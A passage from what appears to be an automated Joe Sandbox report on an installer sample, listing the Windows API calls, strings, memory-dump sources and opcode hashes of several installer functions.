                                                                                            • GetMessagePos.USER32 ref: 00404EB4
                                                                                            • ScreenToClient.USER32(?,?), ref: 00404ECE
                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Send$ClientScreen
                                                                                            • String ID: f
                                                                                            • API String ID: 41195575-1993550816
                                                                                            • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                            • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                                                                            • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                            • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                                                                            Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                            • MulDiv.KERNEL32(002065CE,00000064,002065D2), ref: 00402FE1
                                                                                            • wsprintfW.USER32 ref: 00402FF1
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                            Strings
                                                                                            • verifying installer: %d%%, xrefs: 00402FEB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                            • String ID: verifying installer: %d%%
                                                                                            • API String ID: 1451636040-82062127
                                                                                            • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                            • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                                                                            • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                            • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                                                                            Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                            • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2667972263-0
                                                                                            • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                            • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                                                                            • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                            • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                                                                            Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseEnum$DeleteValue
                                                                                            • String ID:
                                                                                            • API String ID: 1354259210-0
                                                                                            • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                            • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
                                                                                            • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                                                            • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
                                                                                            Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                            • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                            • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                            • String ID:
                                                                                            • API String ID: 1849352358-0
                                                                                            • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                            • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                                                                            • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                            • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                                                                            Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDC.USER32(?), ref: 00401E56
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                            • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 3808545654-0
                                                                                            • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                            • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                                                                            • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                            • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                                                                            Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Timeout
                                                                                            • String ID: !
                                                                                            • API String ID: 1777923405-2657877971
                                                                                            • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                            • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                                                                            • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                                                            • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98
                                                                                            Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                            • wsprintfW.USER32 ref: 00404E2D
                                                                                            • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                            • String ID: %u.%u%s%s
                                                                                            • API String ID: 3540041739-3551169577
                                                                                            • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                            • Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
                                                                                            • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                                                            • Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8
                                                                                            Function 00405ED1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CharNextW.USER32(?,?,C:\,?,00405F45,C:\,C:\,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76F93420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                                            • CharNextW.USER32(00000000), ref: 00405EE4
                                                                                            • CharNextW.USER32(00000000), ref: 00405EFC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext
                                                                                            • String ID: C:\
                                                                                            • API String ID: 3213498283-3404278061
                                                                                            • Opcode ID: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                            • Instruction ID: 143c5bdbadb979d876a68ad22b5e9fde56015454fa81a7c55dbcd1e73dec783f
                                                                                            • Opcode Fuzzy Hash: a019630038ff328a8ec37a6ad8a5e0fa1ea3fa9b42c133706ff5938ffc5cdd25
                                                                                            • Instruction Fuzzy Hash: 03F09072D04A2395DB317B649C45B7756BCEB587A0B54843BE601F72C0DBBC48818ADA
                                                                                            Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E48
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 2659869361-297319885
                                                                                            • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                            • Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
                                                                                            • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                                                            • Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD
                                                                                            Function 00401BA0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GlobalFree.KERNEL32(006A5820), ref: 00401C10
                                                                                            • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401C22
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFree
                                                                                            • String ID: Xj$Installed
                                                                                            • API String ID: 3394109436-1323946118
                                                                                            • Opcode ID: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                                                                            • Instruction ID: 52bd34c5afe528d1e7f7705a0b64ffdd7bdb14472fd10e075fda9825736fe234
                                                                                            • Opcode Fuzzy Hash: b2bf5aa3fb98d5d7659b4efbfb09c2738223d3c1d5b8947c58a47baf3ffb3ed2
                                                                                            • Instruction Fuzzy Hash: B221F972900254E7D720BF98DD89E5E73B5AB04718711093FF552B76C0D7B8AC019B9D
                                                                                            Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                                                            • GetTickCount.KERNEL32 ref: 0040304F
                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                            • String ID:
                                                                                            • API String ID: 2102729457-0
                                                                                            • Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                            • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                                                                            • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                            • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                                                                            Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 0040557F
                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                                                                              • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3748168415-3916222277
                                                                                            • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                            • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                                                                            • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                            • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                                                                            Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(?,76F93420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                                                                            Memory Dump Source
